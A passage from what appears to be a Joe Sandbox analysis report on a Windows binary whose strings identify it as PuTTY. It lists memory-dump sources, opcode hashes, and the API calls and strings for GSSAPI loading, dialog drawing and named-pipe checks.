                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7c229e466ae1874834a791bdb4f6e6396bbec919651088c97eaa8f3f94fff51c
                    • Instruction ID: f9bc78e9ba63a92407c4e88f4a1d29aeba5c16d5aed0349923be0cd03bc68b53
                    • Opcode Fuzzy Hash: 7c229e466ae1874834a791bdb4f6e6396bbec919651088c97eaa8f3f94fff51c
                    • Instruction Fuzzy Hash: 8902AC71A183419FD724DF28C881BABB7E1EF88314F14886DF99997391D735E858CB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4528eec14bead00aa2d9c85ba96f400933376672da741788ed4faa78718e8c59
                    • Instruction ID: 2f8a6629fbf6bee2d889c0863c8f4565cea0a496336d10421b216b2cf4d7b672
                    • Opcode Fuzzy Hash: 4528eec14bead00aa2d9c85ba96f400933376672da741788ed4faa78718e8c59
                    • Instruction Fuzzy Hash: 86E13E729497248BC324DF59D88029AF3E1BF88714F4B8A3DDD99E7301D675AD108BC6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4fe759b8f0d9f3ddc17931c565871c1950d0d189f6f7cd7ee860d1120e07df5d
                    • Instruction ID: fb3446faec79aa9531b12ac28efc8fd539d724702778b8c574c8f01c22e26098
                    • Opcode Fuzzy Hash: 4fe759b8f0d9f3ddc17931c565871c1950d0d189f6f7cd7ee860d1120e07df5d
                    • Instruction Fuzzy Hash: 74D18F71A083419FCB18CF24C490FAAB7E1EF95314F1588ADD89A97381D771AC55CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7da40c4257207c4228adc07e7aa66d9599142669ef0fbb5a24738c40c289d609
                    • Instruction ID: 3df4b2988d6f0c2d60f5c7e3a3e3a4e8195615856e9bd059205d1e16fb5477b6
                    • Opcode Fuzzy Hash: 7da40c4257207c4228adc07e7aa66d9599142669ef0fbb5a24738c40c289d609
                    • Instruction Fuzzy Hash: 70B192716047058BC72CDF69DCA156BF7E2BFC8314F09892DE9AA83345DB38A9148F48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0d4738e34f223948a0a3aa5fa8b177caa9eb5847155e6b7b76b15068ea605d9b
                    • Instruction ID: 5dea3fc19cbd6aebe309c3fb4d291c9d16e1b675347cc3ec132512deb22b058f
                    • Opcode Fuzzy Hash: 0d4738e34f223948a0a3aa5fa8b177caa9eb5847155e6b7b76b15068ea605d9b
                    • Instruction Fuzzy Hash: 41913772A007109FD7209E28CC8175AB7E1EFC6320F59862CE8A9973D1E775ED45DB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c857bc6f47c11b45454758b084b7876ee5455ee118828e974ce89500b979fd96
                    • Instruction ID: ba70e9bd01dc4bff4972619139c8d0e31ed4658c69f8a4b0992a62038df8066d
                    • Opcode Fuzzy Hash: c857bc6f47c11b45454758b084b7876ee5455ee118828e974ce89500b979fd96
                    • Instruction Fuzzy Hash: 1FB158E6C0AFA947EB136B3E9C83252B650AFF3294B10C347FCB076D52E711E554A204
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 689a8463b672db8d1c6ca4baa45038dd3f81f79e98cb7c58fd19a428798e5e6f
                    • Instruction ID: ff37247d1cab8a690457534a9ddb2a1a5672e6d5f2a0c341fe406148ecbcd295
                    • Opcode Fuzzy Hash: 689a8463b672db8d1c6ca4baa45038dd3f81f79e98cb7c58fd19a428798e5e6f
                    • Instruction Fuzzy Hash: D1B19CB29083059FC340CF1AD88051AFBE1BFC8764F5A991EF998A3711D770E9598F86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 40c5af2cbb30f09750c43913967a71936f2f1ca84df114ea6cb75d0a2ff5e618
                    • Instruction ID: a78476a51d8aa454a1a9a455bd117751e44fcb614b2c67dbb5eb47b9fdbe9e2c
                    • Opcode Fuzzy Hash: 40c5af2cbb30f09750c43913967a71936f2f1ca84df114ea6cb75d0a2ff5e618
                    • Instruction Fuzzy Hash: 22912E746047019FDB20CF68C885F267BE5EF6A314F1409ACEA9A9B292C772FC51CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: faf02e245addd143875e38bb15a9324179dc89c0f84e1bd529225dbb1d473599
                    • Instruction ID: b358e3eacf2535effa9e882492e753d9cec246bcbb0fd7ed4492d8db02edfba2
                    • Opcode Fuzzy Hash: faf02e245addd143875e38bb15a9324179dc89c0f84e1bd529225dbb1d473599
                    • Instruction Fuzzy Hash: B4A15F71A10952ABC35ACF1DC894BB5B3A1FB44309F8A8339DE4557288CB39B935CBD4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6192e6599f6c1a011b87dc1cb94f1ec900cf2b7d554ac711b2e4dab0462bc958
                    • Instruction ID: 3de607834fd322eddff4999d0b1231d790840e59325b55b77c8b664b410a98f8
                    • Opcode Fuzzy Hash: 6192e6599f6c1a011b87dc1cb94f1ec900cf2b7d554ac711b2e4dab0462bc958
                    • Instruction Fuzzy Hash: 434101B7E097280BC7149E64A4D53A6B3C2EBD9211F0F456CEDE967382DA74AD148BC0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 58aab18527f2d9c54fbc44a68bfb9820579336934f8c8de9481524afc0a08eb2
                    • Instruction ID: fdb84fd0a181873916c1f6638ae6c30ae2ba62b05b5df983283e2960f871c6bb
                    • Opcode Fuzzy Hash: 58aab18527f2d9c54fbc44a68bfb9820579336934f8c8de9481524afc0a08eb2
                    • Instruction Fuzzy Hash: 6B51C6B490430857D734EA10EC46FDBB398FB98708F508C3CE585932C3EA75A66AD796
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b82f4562c825d87db9937be0d784f959c9f6ed46b2b441a05cc9ce24cb6843e9
                    • Instruction ID: 789b51857b0f80103f960719d8503196d4d1653bfe6527b390a70101da8478f0
                    • Opcode Fuzzy Hash: b82f4562c825d87db9937be0d784f959c9f6ed46b2b441a05cc9ce24cb6843e9
                    • Instruction Fuzzy Hash: E251B375E00219EFDF14CF99C981AEEBBB2EF88300F59805DE815AB201D7349E94CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd

                    APIs
                    • GetProcAddress.KERNEL32(00000000,AddDllDirectory), ref: 00C0034B
                    • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\MIT\Kerberos,?), ref: 00C0037D
                    • RegQueryValueExA.ADVAPI32(?,InstallDir,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00C003A6
                    • RegQueryValueExA.ADVAPI32(?,InstallDir,00000000,?,00000000,?), ref: 00C003E3
                    • _strlen.LIBCMT ref: 00C003FF
                    • _strlen.LIBCMT ref: 00C0043C
                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000D00), ref: 00C0046A
                    • RegCloseKey.ADVAPI32(?), ref: 00C004D6
                    • GetProcAddress.KERNEL32(00000000,gss_delete_sec_context), ref: 00C00518
                    • GetProcAddress.KERNEL32(00000000,gss_display_status), ref: 00C00524
                    • GetProcAddress.KERNEL32(00000000,gss_get_mic), ref: 00C00530
                    • GetProcAddress.KERNEL32(00000000,gss_verify_mic), ref: 00C0053C
                    • GetProcAddress.KERNEL32(00000000,gss_import_name), ref: 00C00548
                    • GetProcAddress.KERNEL32(00000000,gss_init_sec_context), ref: 00C00554
                    • GetProcAddress.KERNEL32(00000000,gss_release_buffer), ref: 00C00560
                    • GetProcAddress.KERNEL32(00000000,gss_release_cred), ref: 00C0056C
                    • GetProcAddress.KERNEL32(00000000,gss_release_name), ref: 00C00578
                    • GetProcAddress.KERNEL32(00000000,gss_acquire_cred), ref: 00C00584
                    • GetProcAddress.KERNEL32(00000000,gss_inquire_cred_by_mech), ref: 00C00590
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00BD73A0,?), ref: 00C005AB
                    • FreeLibrary.KERNEL32(00000000), ref: 00C0049E
                      • Part of subcall function 00BEB850: LoadLibraryA.KERNELBASE(00000000,00000000,?,00BF99F0,kernel32.dll), ref: 00BEB86F
                    • GetProcAddress.KERNEL32(00000000,AcquireCredentialsHandleA), ref: 00C005FA
                    • GetProcAddress.KERNEL32(00000000,InitializeSecurityContextA), ref: 00C00607
                    • GetProcAddress.KERNEL32(00000000,FreeContextBuffer), ref: 00C00614
                    • GetProcAddress.KERNEL32(00000000,FreeCredentialsHandle), ref: 00C00621
                    • GetProcAddress.KERNEL32(00000000,DeleteSecurityContext), ref: 00C0062E
                    • GetProcAddress.KERNEL32(00000000,QueryContextAttributesA), ref: 00C0063B
                    • GetProcAddress.KERNEL32(00000000,MakeSignature), ref: 00C00648
                    • GetProcAddress.KERNEL32(00000000,VerifySignature), ref: 00C00655
                    • _strlen.LIBCMT ref: 00C006DC
                    • LoadLibraryExA.KERNEL32(?,00000000,00000D00,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C00757
                    • GetProcAddress.KERNEL32(00000000,gss_delete_sec_context), ref: 00C007A5
                    • GetProcAddress.KERNEL32(00000000,gss_display_status), ref: 00C007B1
                    • GetProcAddress.KERNEL32(00000000,gss_get_mic), ref: 00C007BD
                    • GetProcAddress.KERNEL32(00000000,gss_verify_mic), ref: 00C007C9
                    • GetProcAddress.KERNEL32(00000000,gss_import_name), ref: 00C007D5
                    • GetProcAddress.KERNEL32(00000000,gss_init_sec_context), ref: 00C007E1
                    • GetProcAddress.KERNEL32(00000000,gss_release_buffer), ref: 00C007ED
                    • GetProcAddress.KERNEL32(00000000,gss_release_cred), ref: 00C007F9
                    • GetProcAddress.KERNEL32(00000000,gss_release_name), ref: 00C00805
                    • GetProcAddress.KERNEL32(00000000,gss_acquire_cred), ref: 00C00811
                    • GetProcAddress.KERNEL32(00000000,gss_inquire_cred_by_mech), ref: 00C0081D
                    Strings
                    Similarity
                    • API ID: AddressProc$Library$Load_strlen$CloseQueryValue$FreeOpen
                    • String ID: %.*s$2.dl$AcquireCredentialsHandleA$AddDllDirectory$DeleteSecurityContext$FreeContextBuffer$FreeCredentialsHandle$InitializeSecurityContextA$InstallDir$MakeSignature$QueryContextAttributesA$SOFTWARE\MIT\Kerberos$Using GSSAPI from user-specified library '%s'$VerifySignature$api3$gss_acquire_cred$gss_delete_sec_context$gss_display_status$gss_get_mic$gss_import_name$gss_init_sec_context$gss_inquire_cred_by_mech$gss_release_buffer$gss_release_cred$gss_release_name$gss_verify_mic$kernel32.dll$l$secur32.dll

                    APIs
                    • GetWindowLongA.USER32 ref: 00BCE641
                    • SetBkMode.GDI32(?,00000001), ref: 00BCE65D
                    • GetStockObject.GDI32(0000000D), ref: 00BCE665
                    • SelectObject.GDI32(?,00000000), ref: 00BCE66D
                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 00BCE67B
                    • CreateFontIndirectA.GDI32(?), ref: 00BCE6A2
                    • SelectObject.GDI32(?,00000000), ref: 00BCE6AE
                    • GetSysColorBrush.USER32(0000000F), ref: 00BCE6B6
                    • SetDlgItemTextA.USER32 ref: 00BCE777
                    • SetWindowTextA.USER32(?), ref: 00BCE795
                    • GetDlgItem.USER32 ref: 00BCE7A8
                    • DestroyWindow.USER32(00000000), ref: 00BCE7B3
                    • SendDlgItemMessageA.USER32(?,00000064,000000BA,00000000,00000000), ref: 00BCE7C5
                    • MapDialogRect.USER32(?,00000028), ref: 00BCE808
                    • GetDlgItem.USER32 ref: 00BCE82E
                    • GetDlgItem.USER32 ref: 00BCE857
                    Strings
                    Similarity
                    • API ID: Item$Object$Window$SelectText$BrushColorCreateDestroyDialogFontIndirectLongMessageModeRectSendStock
                    • String ID: %s$<$PuTTYHostKeyMoreInfo

                    APIs
                    • ___from_strstr_to_strchr.LIBCMT ref: 00C3ED34
                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,40000000,00000000,?,?,?,?,?,00C3EEB8,?), ref: 00C3ED75
                    • GetLastError.KERNEL32(?,?,?,?,?,00C3EEB8,?), ref: 00C3ED7C
                    • WaitNamedPipeA.KERNEL32 ref: 00C3ED8A
                    • GetLastError.KERNEL32(?,?,?,?,?,00C3EEB8,?), ref: 00C3ED94
                      • Part of subcall function 00BEC330: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC367
                      • Part of subcall function 00BEC330: OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC375
                      • Part of subcall function 00BEC330: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3B4
                      • Part of subcall function 00BEC330: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3D1
                      • Part of subcall function 00BEC330: GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3FB
                      • Part of subcall function 00BEC330: CopySid.ADVAPI32(00000000,00000000,00000000), ref: 00BEC41A
                      • Part of subcall function 00BEC330: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC43B
                      • Part of subcall function 00BEC330: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC44A
                      • Part of subcall function 00BEC330: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC455
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00C3EEB8,?), ref: 00C3EDD7
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00C3EEB8,?), ref: 00C3EDDD
                      • Part of subcall function 00BECC90: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BE69BE,?), ref: 00BECD1B
                      • Part of subcall function 00BECC90: _strlen.LIBCMT ref: 00BECD26
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00C3EEB8,?), ref: 00C3EE15
                    • GetLastError.KERNEL32(?,?,?,?,?,00C3EEB8,?), ref: 00C3EE1B
                    • EqualSid.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00C3EEB8,?), ref: 00C3EE37
                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,00C3EEB8,?), ref: 00C3EE44
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/named-pipe-client.c, xrefs: 00C3ED1C, 00C3ED42
                    • Error waiting for named pipe '%s': %s, xrefs: 00C3EDA5
                    • strncmp(pipename, "\\\\.\\pipe\\", 9) == 0, xrefs: 00C3ED21
                    • Unable to get user SID: %s, xrefs: 00C3EE2B
                    • Unable to get named pipe security information: %s, xrefs: 00C3EDED
                    • strchr(pipename + 9, '\\') == NULL, xrefs: 00C3ED47
                    • Unable to open named pipe '%s': %s, xrefs: 00C3EE05
                    • \\.\pipe\, xrefs: 00C3ED08
                    • Owner of named pipe '%s' is not us, xrefs: 00C3EE5D
                    Similarity
                    • API ID: ErrorLast$CloseHandle$Local$FreeProcess$AllocCopyCreateCurrentEqualFileFormatLengthMessageNamedOpenPipeWait___from_strstr_to_strchr_strlen
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/named-pipe-client.c$Error waiting for named pipe '%s': %s$Owner of named pipe '%s' is not us$Unable to get named pipe security information: %s$Unable to get user SID: %s$Unable to open named pipe '%s': %s$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0

                    APIs
                    Strings
                    Similarity
                    • API ID: _strftime
                    • String ID: %Y-%m-%d %H:%M:%S UTC$cert_ca_key$cert_ca_key_$cert_ca_key_algorithm_id$cert_ca_sig$cert_critical_option$cert_critical_option_data$cert_extension$cert_extension_data$cert_key_id$cert_nonce$cert_serial$cert_type$cert_valid_after$cert_valid_after_date$cert_valid_before$cert_valid_before_date$cert_valid_principal$host$user

                    APIs
                    • DeleteObject.GDI32 ref: 00BD47F8
                    • CreateCompatibleDC.GDI32(00000000), ref: 00BD481E
                    • SelectObject.GDI32(00000000), ref: 00BD482D
                    • _strlen.LIBCMT ref: 00BD4834
                    • GetTextExtentPoint32A.GDI32(00000000,?,00000000,?), ref: 00BD4844
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000016), ref: 00BD4863
                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00BD486E
                    • DeleteDC.GDI32(00000000), ref: 00BD4875
                    • DefWindowProcA.USER32(?,?,?,?), ref: 00BD4882
                    • BeginPaint.USER32(?,?), ref: 00BD4895
                    • SelectObject.GDI32(00000000), ref: 00BD48AA
                    • GetStockObject.GDI32(00000007), ref: 00BD48AE
                    • SelectObject.GDI32(00000000,00000000), ref: 00BD48B6
                    • CreateSolidBrush.GDI32 ref: 00BD48BE
                    • SelectObject.GDI32(00000000,00000000), ref: 00BD48CA
                    • GetClientRect.USER32(?,?), ref: 00BD48D5
                    • Rectangle.GDI32(00000000,?,?,?,?), ref: 00BD48EC
                    • GetWindowTextLengthA.USER32(?), ref: 00BD48F3
                    • GetWindowTextA.USER32 ref: 00BD4914
                    • SetTextColor.GDI32(00000000), ref: 00BD4921
                    • SetBkColor.GDI32(00000000), ref: 00BD492E
                    • TextOutA.GDI32(00000000,?,?,00000000,00000000), ref: 00BD4947
                    • SelectObject.GDI32(00000000), ref: 00BD495A
                    • DeleteObject.GDI32(?), ref: 00BD4964
                    • EndPaint.USER32(?,?), ref: 00BD4970
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Object$SelectText$Window$Delete$ColorCreatePaintRect$BeginBrushClientCompatibleExtentInvalidateLengthPoint32ProcRectangleSolidStock_strlen
                    • String ID:
                    • API String ID: 2408264671-0
                    • Opcode ID: ab847e40165181101ab26e7ab0bb8c3fa8fd19ca5048efb6207fbe6df8c416ab
                    • Instruction ID: 8533a0a4cbe6ce03e0f10158dc16d1ea5b1d4c1dc091ba1dde2e76e67fe2c95b
                    • Opcode Fuzzy Hash: ab847e40165181101ab26e7ab0bb8c3fa8fd19ca5048efb6207fbe6df8c416ab
                    • Instruction Fuzzy Hash: 1E515E72504200AFD3119F60EC49F6F7BA9EB8E759F000519F64793260DB35A905DB66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetDC.USER32 ref: 00BB8583
                    • GetDeviceCaps.GDI32(00000000,00000026), ref: 00BB858E
